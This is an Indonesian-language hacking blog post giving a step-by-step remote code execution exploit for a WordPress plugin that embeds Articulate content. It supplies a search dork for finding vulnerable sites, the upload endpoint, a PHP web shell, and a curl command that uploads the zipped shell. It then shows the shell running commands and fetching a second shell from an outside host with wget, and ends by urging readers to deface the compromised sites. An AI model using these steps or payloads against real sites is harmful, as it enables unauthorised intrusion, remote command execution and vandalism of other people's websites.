Breaking

Minggu, 15 September 2019

Exploit WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution

Halo gaezz :3 halo apa kabar? Pagi ini w kasih tutorial WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution. Gatau lagi gabut aj nyoret nyoret blog lagi hehe dahal gada yg peduli.

Dork: inurl:/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress (kembangin sendiri ya k*nt*l jan maled)
Payload: index.php/wp-json/articulate/v1/upload-data
Ref: Exploit Kita

Ngedork dlo gaes :vrooot
Masukin payloadnya ke site target
Example: localhost/index.php/wp-json/articulate/v1/upload-data
Vuln? Ada tulisan mcm ni
Nyamuk Disc0de :
{"code":"rest_no_route","message":"No route was found matching the URL and request method","data":{"status":404}}

Lalu bikin file index.html dan index.php dulu bro
<html>Hacked by N4ST4R_ID</html>

<?php system($_GET[cmd]); ?>
Lalu kedua file diatas kita compress ke file zip muehehe

Jika sudah buka termux bro kita ekse pake curl
curl localhost/index.php/wp-json/articulate/v1/upload-data -F "name={nstr.zip}" -F "chunk={3}" -F "chunks={4}" -F "file=@nstr.zip"
Jika sukses terupload akan ada tulisan "OK" "Upload Complete!"

Mari kita akses ngohaha xD
aksesnya localhost/wp-content/uploads/articulate_uploads/nstr/
NB: "nstr" adalah nama file Zip yg di compress tadi
Buka file index.php (wp-content/uploads/articulate_uploads/nstr/index.php)
Blank? Ya emng gt coba ketik ?cmd=uname -a (index.php?cmd=uname -a)
Muncul versi kernelnya? Berarti sukses :D

Tinggal pasang upload/shell aj (disini w pasang uploader gaed) http://flickr.com.tvcw.org/shell.php

index.php?cmd=wget http://flickr.com.tvcw.org/shell.php
Akses nya di wp-content/uploads/articulate_uploads/nstr/shell.php

Sudah sukses tinggal di depes sadja bro h3h3. Butuh pertanyaan? Kontak dibawah



Tidak ada komentar:

Posting Komentar